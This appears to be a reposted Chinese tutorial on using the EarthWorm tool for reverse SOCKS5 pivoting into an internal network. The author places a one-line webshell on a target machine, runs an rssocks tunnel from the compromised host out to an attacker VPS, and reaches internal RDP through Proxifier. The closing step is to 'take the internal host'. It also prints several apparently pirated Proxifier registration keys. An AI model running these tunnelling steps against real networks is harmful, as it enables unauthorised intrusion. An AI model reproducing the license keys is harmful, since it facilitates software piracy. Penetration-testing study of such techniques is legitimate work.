本文主要是介绍EW之Socks5反向代理内网穿透,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
EW(earthworm)功能介绍
EW 是一套便携式的网络穿透工具,具有 SOCKS v5服务架设和端口转发两大核心功能,可在复杂网络环境下完成网络穿透。该工具能够以“正向”、“反向”、“多级级联”等方式打通一条网络隧道,直达网络深处,用蚯蚓独有的手段突破网络限制,给防火墙松土。
准备阶段
在靶机网站上传一句话马使用蚁剑连接
ipconfig /all
一台外网vps:110.42.229.X
一台内网靶机:192.168.1.5(3389开放)
内网机器(无公网ip需要反弹到公网,需要在vps监听
vps服务端执行:
./ew_for_linux64 -s rcsocks -l 6666 -e 6667
这条命令的意思是说让公网服务器监听6666和6667端口,等待攻击者机器访问6666端口,目标机器访问6667端口。
如果机器报错:
Error: bind port xxxx
则可能是因为该端口被进程占用,查询占用进程,杀掉该进程,重新执行命令即可。
lsof -i:xxxx
内网机器执行:
ew_for_Win.exe -s rssocks -d vps的ip -e 6667
使用方式:sock5代理访问的6666端口
火狐添加代理
访问192.168.1.5
可以访问内网,实现内网穿透
使用proxifier代理
Proxifier Standard 版本注册码:
QBZ9F-D3VWW-BQ7YC-XUKWY-RB95P
D6ZMK-HY6A3-LYR3S-8U8KA-YEE6E
AVZCR-B2SKY-FEYW3-8AR76-2R5ZG
C8ZXW-D2TW8-QL7WV-U3PH7-38L4H
vps的IP和刚刚的6666端口
添加规则
localhost改为direct
添加程序与路由–browse 选择mstsc.exe
即可
拿下内网主机
这篇关于EW之Socks5反向代理内网穿透的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!